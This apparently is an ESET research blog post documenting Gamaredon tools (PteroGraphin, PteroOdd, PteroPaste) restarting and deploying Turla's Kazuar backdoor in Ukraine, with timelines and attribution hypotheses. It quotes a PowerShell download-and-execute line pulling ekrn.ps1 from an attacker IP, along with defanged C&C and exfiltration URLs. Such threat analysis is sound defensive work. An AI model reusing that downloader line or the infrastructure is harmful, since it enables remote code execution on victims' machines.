Gamaredon X Turla collab

In this blogpost, we uncover the first known cases of collaboration between Gamaredon and Turla, in Ukraine.

Key points of this blogpost:

• In February 2025, we discovered that the Gamaredon tool PteroGraphin was used to restart Turla’s Kazuar backdoor on a machine in Ukraine.
• In April and June 2025, we detected that Kazuar v2 was deployed using Gamaredon tools PteroOdd and PteroPaste.
• These discoveries lead us to believe with high confidence that Gamaredon is collaborating with Turla.
• Turla’s victim count is very low compared to the number of Gamaredon compromises, suggesting that Turla choose the most valuable machines.
• Both groups are affiliated with the FSB, Russia’s main domestic intelligence and security agency.

Threat actor profiles

Gamaredon

Gamaredon has been active since at least 2013. It is responsible for many attacks, mostly against Ukrainian governmental institutions, as evidenced over time in several reports from CERT-UA and from other official Ukrainian bodies. Gamaredon has been attributed by the Security Service of Ukraine (SSU) to the Center 18 of Information Security of the FSB, operating out of occupied Crimea. We believe this group to be collaborating with another threat actor that we discovered and named InvisiMole.

Turla

Turla, also known as Snake, is an infamous cyberespionage group that has been active since at least 2004, possibly extending back into the late 1990s. It is thought to be part of the FSB. It mainly focuses on high-profile targets, such as governments and diplomatic entities, in Europe, Central Asia, and the Middle East. It is known for having breached major organizations such as the US Department of Defense in 2008 and the Swiss defense company RUAG in 2014. During the past few years, we have documented a large part of Turla’s arsenal on the WeLiveSecurity blog and in private reports.

Overview

In February 2025, via ESET telemetry, we detected four different Gamaredon-Turla co-compromises in Ukraine. On those machines, Gamaredon deployed a wide range of tools, including PteroLNK, PteroStew, PteroOdd, PteroEffigy, and PteroGraphin, while Turla only deployed Kazuar v3.

On one of those machines, we were able to capture a payload showing that Turla is able to issue commands via Gamaredon implants. PteroGraphin was used to restart Kazuar, possibly after Kazuar crashed or was not launched automatically. Thus, PteroGraphin was probably used as a recovery method by Turla. This is the first time that we have been able to link these two groups together via technical indicators (see First chain: Restart of Kazuar v3).

Because, in all four cases, the ESET endpoint product was installed after the compromises we are unable to pinpoint the exact compromise method. However, Gamaredon is known for using spearphishing and malicious LNK files on removable drives (as explained in our recent blogpost) so we presume that one of these is the most likely compromise vector.

In April and June 2025, we detected Kazuar v2 installers being deployed directly by Gamaredon tools (see Second chain: Deployment of Kazuar v2 via PteroOdd and Third chain: Deployment of Kazuar v2 via PteroPaste). This shows that Turla is actively collaborating with Gamaredon to gain access to specific machines in Ukraine.

Victimology

Over the past 18 months we have detected Turla on seven machines in Ukraine. We believe that Gamaredon compromised the first four machines in January 2025, while Turla deployed Kazuar v3 in February 2025. In all cases, the ESET endpoint product was only installed after both compromises.

It is worth noting that, prior to this, the last time we detected a Turla compromise in Ukraine was in February 2024.

All those elements, and the fact that Gamaredon is compromising hundreds if not thousands of machines, suggest that Turla is interested only in specific machines, probably ones containing highly sensitive intelligence.

Attribution

Gamaredon

In those compromises, we detected PteroLNK, PteroStew, and PteroGraphin, which we believe are exclusive to Gamaredon.

Turla

Similarly, for Turla, we detected the use of Kazuar v2 and Kazuar v3, which we believe are exclusive to that group.

Gamaredon-Turla collaboration hypotheses

In 2020, we showed that Gamaredon provided access to InvisiMole (see our white paper), so it is not the first time that Gamaredon has collaborated with another Russia-aligned threat actor.

On the other hand, Turla is known for hijacking other threat actors’ infrastructure to get an initial foothold in its targets’ networks. Over the past years, several cases have been publicly documented:

• In 2019, Symantec published a blogpost showing that Turla hijacked OilRig (an Iran-aligned group) infrastructure to spy on a Middle Eastern target.
• In 2023, Mandiant published a blogpost showing that Turla reregistered expired Andromeda C&C domains in order to compromise targets in Ukraine.
• In 2024, Microsoft published two blogposts (first and second) showing that Turla hijacked the cybercrime botnet Amadey and infrastructure of the cyberespionage group SideCopy (a Pakistan-aligned group) in order to deploy Kazuar.

Note that both Gamaredon and Turla are part of the Russian Federal Security Service (FSB). Gamaredon is thought to be operated by officers of Center 18 of the FSB (aka the Center for Information Security) in Crimea (see this report from the Security Service of Ukraine), which is part of the FSB’s counterintelligence service. As for Turla, the UK’s NCSC attributes the group to the Center 16 of the FSB, which is Russia’s main signals intelligence (SIGINT) agency.

Therefore, we propose three hypotheses to explain our observations:

• Very likely: Given that both groups are part of the Russian FSB (though in two different Centers), Gamaredon provided access to Turla operators so that they could issue commands on a specific machine to restart Kazuar, and deploy Kazuar v2 on some others.
• Unlikely: Turla compromised Gamaredon infrastructure and leveraged this access to recover access on a machine in Ukraine. Since PteroGraphin contains a hardcoded token that allows modifying the C&C pages, this possibility cannot be fully discarded. However, it implies that Turla was able to reproduce the full Gamaredon chain.
• Unlikely: Gamaredon has access to Kazuar and deploys it on very specific machines. Given Gamaredon’s noisy approach, we don’t think it would be that careful deploying Kazuar on only a very limited set of victims.

Geopolitical context

From an organizational perspective, it is worth noting that the two entities commonly associated with Turla and Gamaredon have a long history of reported collaboration, which can be traced back to the Cold War era.

The FSB’s Center 16 (which is believed to harbor Turla) is a direct heir to the KGB’s 16^th Directorate, which was mainly responsible for foreign SIGINT collection – the persistence of the number 16 is in fact regarded by observers as a sign of the FSB leadership’s desire to emphasize a historical lineage. Center 18 (which is generally associated with Gamaredon) maintains a rough affiliation with the KGB’s 2^nd Chief Directorate, which was responsible for internal security within the Soviet Union. During the Soviet era, both organizations frequently worked hand in hand, sharing responsibilities for monitoring foreign embassies on Russian soil for instance.

Then and now, such collaborations reflect the Russian strategic culture and philosophy of a natural continuity between internal security and national defense. Although Center 16 is still tasked with foreign intelligence collection and Center 18 is theoretically part of the FSB’s counterintelligence apparatus, both entities seem to maintain some mission overlaps – especially with regard to former Soviet republics. In 2018, the Security Service of Ukraine (SBU) had already observed Centers 16 and 18 apparently conducting a joint cyberespionage campaign (named SpiceyHoney). The 2022 full-scale invasion of Ukraine has probably reinforced this convergence, with ESET data clearly showing Gamaredon and Turla activities focusing on the Ukrainian defense sector in recent months.

Although the Russian intelligence community is known for its fierce internal rivalries, there are indications that such tensions chiefly apply to interservice relations rather than to intra-agency interactions. In this context, it is perhaps not entirely surprising that APT groups operating within these two FSB Centers are observed cooperating to some extent.

First chain: Restart of Kazuar v3

In February 2025, we detected the execution of Kazuar by PteroGraphin and PteroOdd on a machine in Ukraine. In this section we detail the exact chain that we detected.

Timeline

The overall timeline for this machine is the following:

• 2025-01-20: Gamaredon deployed PteroGraphin on the machine. Note that the date is from the file creation timestamp provided by Windows, which could have been tampered with.
• 2025-02-11: Turla deployed Kazuar v3 on the machine. Note that the date is from the file creation timestamp provided by Windows, which could have been tampered with.
• 2025-02-27 15:47:39 UTC: PteroGraphin downloaded PteroOdd.
• 2025-02-27 15:47:56 UTC: PteroOdd downloaded a payload, which executed Kazuar.
• 2025-02-28 15:17:14 UTC: PteroOdd downloaded another payload, which also executed Kazuar.

Hereafter, we assume these dates to be unaltered.

Details of the events

Since January 20^th, 2025, PteroGraphin (see Figure 1) was present on the machine at %APPDATA%\x86.ps1. It is a downloader that provides an encrypted channel for delivering payloads via Telegra.ph, a web service operated by Telegram that enables easy creation of web pages. Note that PteroGraphin contains a token to edit the Telegra.ph page, so anyone with knowledge of this token (Turla, for example, though unlikely) could manipulate the contents.

On February 27^th, 2025, at 15:47:39 UTC, as shown in Figure 2, we detected a reply from https://api.telegra[.]ph/getPage/SecurityHealthSystray-01-20?return_content=true.

The data in children can be decrypted using the hardcoded 3DES key and IV from the PteroGraphin script above, which gives:

powershell -windowStyle hidden -EncodedCommand

The decoded payload is another PowerShell downloader that we named PteroOdd, shown in Figure 3.

On February 27^th, 2025 at 15:47:56 UTC, we detected a request to https://api.telegra[.]ph/getPage/dinoasjdnl-02-27?return_content=true; the reply is shown in Figure 4. Note that the replies for PteroOdd are not encrypted.

The decoded command is shown in Figure 5.

The payload first uploads the victim’s computer name and system drive’s volume serial number to the Cloudflare worker subdomain https://lucky-king-96d6.mopig92456.workers[.]dev.

What is most interesting is the last line:

Start-Process -FilePath “C:\Users\[redacted]\AppData\Local\Programs\Sony\Audio\Drivers\vncutil64.exe”

This is the path to the application that is run to execute Kazuar by side-loading it. The ESET endpoint product detected a KERNEL Kazuar v3 payload (agent_label is AGN-RR-01) in memory and loaded from this process. It is not clear to us why Turla operators had to use PteroGraphin to launch Kazuar, but it is possible that Kazuar somehow stopped working after the ESET product installation and that they had to restart the implant. Note that we didn’t see Gamaredon downloading Kazuar; it was present on the system since February 11^th, 2025, before the ESET product was installed.

Then, on February 28^th, 2025 at 15:17:14 UTC, we detected another similar PowerShell script, shown in Figure 6.

The first lines and the Cloudflare worker subdomain are identical. It starts the same vncutil64.exe but also a second executable, LaunchGFExperience.exe, which side-loads LaunchGFExperienceLOC.dll – the Kazuar loader. We then detected in memory, in the LaunchGFExperience.exe process, another KERNEL Kazuar v3 payload (agent_label is AGN-XX-01). It is not clear why two different KERNEL Kazuar v3 payloads were present on the same machine.

Finally, an HTTP POST request, with the list of running processes, was sent to https://eset.ydns[.]eu/post.php. The Turla operators most likely wanted confirmation that Kazuar was successfully launched.

On March 10^th, 2025 at 07:05:32 UTC, we detected another sample of PteroOdd, which uses the C&C URL https://api.telegra[.]ph/getPage/canposgam-03-06?return_content=true. This sample was detected on a different machine in Ukraine, on which Kazuar was also present.

The decoded payload is shown in Figure 7 and shows that it also uses eset.ydns[.]eu, while not interacting with any Turla sample.

On the other hand, we noted that the downloaded payload uploads the following pieces of information to https://eset.ydns[.]eu/post.php:

However, we are not aware of any .NET tool that is currently being used by Gamaredon, while there are several of them used by Turla, including Kazuar. Thus, it is possible that these uploaded pieces of information are for Turla, and we assess with medium confidence that the domain eset.ydns[.]eu is controlled by Turla.

The additional base64-encoded PowerShell command is a new downloader that abuses api.gofile[.]io; we named it PteroEffigy.

Kazuar v3

Kazuar v3 is the latest branch of the Kazuar family, itself an advanced C# espionage implant that we believe is used exclusively by Turla since it was first seen in 2016. Kazuar v2 and v3 are fundamentally the same malware family and share the same codebase. However, some major changes have been introduced.

Kazuar v3 comprises around 35% more C# lines than Kazuar v2 and introduces additional network transport methods: over web sockets and Exchange Web Services. Kazuar v3 can have one of three roles (KERNEL, BRIDGE, or WORKER), and malware functionalities are divided among those roles. For example, only BRIDGE communicates with the C&C server.

Second chain: Deployment of Kazuar v2 via PteroOdd

On one of the Ukrainian machines mentioned in the previous section, we detected another interesting compromise chain on April 18^th, 2025.

On April 18^th, 2025 at 15:26:14 UTC, we detected a PteroOdd sample (a Gamaredon tool) downloading a payload from https://api.telegra[.]ph/getPage/scrsskjqwlbw-02-28?return_content=true. The downloaded script, shown in Figure 8, is similar to the payload described in the first chain, but contains an additional base64-encoded script, which is the PowerShell downloader PteroEffigy.

This PowerShell payload downloads another payload from https://eset.ydns[.]eu/scrss.ps1 and executes it.

scrss.ps1 turned out to be an installer for Turla’s Kazuar v2, which was previously analyzed in detail by Unit42. This shows that Gamaredon deployed Kazuar, most likely on behalf of Turla.

The Kazuar agent_label is AGN-AB-26 and the three C&C servers are:

• https://abrargeospatial[.]ir/wp-includes/fonts/wp-icons/index.php
• https://www.brannenburger-nagelfluh[.]de/wp-includes/style-engine/css/index.php
• https://www.pizzeria-mercy[.]de/wp-includes/images/media/bar/index.php

It is worth noting that Turla keeps using compromised WordPress servers as C&Cs for Kazuar.

Interestingly, it seems that Kazuar v2 is still maintained in parallel to Kazuar v3. For example, the recent updates to the backdoor commands in Kazuar v3 are also included in this AGN-AB-26 version.

Third chain: Deployment of Kazuar v2 via PteroPaste

On June 5^th and 6^th, 2025, we detected Gamaredon deploying a Turla implant on two machines in Ukraine. In both cases, Gamaredon’s PteroPaste was caught trying to execute the simple PowerShell script shown in Figure 9.

The base64-encoded string is the following downloader in PowerShell:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object Net.WebClient).downloadString(‘https://91.231.182[.]187/ekrn.ps1’);

The downloaded script ekrn.ps1 is very similar to scrss.ps1 mentioned in the second chain. This also drops and installs Kazuar v2.

Both samples have an agent_label of AGN-AB-27 and the C&C servers are the same as those in the sample from the second chain:

• https://www.brannenburger-nagelfluh[.]de/wp-includes/style-engine/css/index.php
• https://www.pizzeria-mercy[.]de/wp-includes/images/media/bar/index.php
• https://abrargeospatial[.]ir/wp-includes/fonts/wp-icons/index.php

ekrn.exe is a legitimate process of ESET endpoint security products. Thus, Turla probably tried to masquerade as it in order to fly under the radar. Also note that ekrn.ydns[.]eu resolves to 91.231.182[.]187.

Finally, we also found on VirusTotal a VBScript variant of the Kazuar v2 PowerShell installer. It was uploaded from Kyrgyzstan on June 5^th, 2025. This suggests that Turla is interested in targets outside of Ukraine as well.

Conclusion

In this blogpost, we have shown how Turla was able to leverage implants operated by Gamaredon (PteroGraphin, PteroOdd, and PteroPaste) in order to restart Kazuar v3 and deploy Kazuar v2 on several machines in Ukraine. We now believe with high confidence that both groups – separately associated with the FSB – are cooperating and that Gamaredon is providing initial access to Turla.

For any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com. 

ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.

IoCs

A comprehensive list of indicators of compromise (IoCs) and samples can be found in our GitHub repository.

Files

Network

MITRE ATT&CK techniques

This table was built using version 17 of the MITRE ATT&CK framework.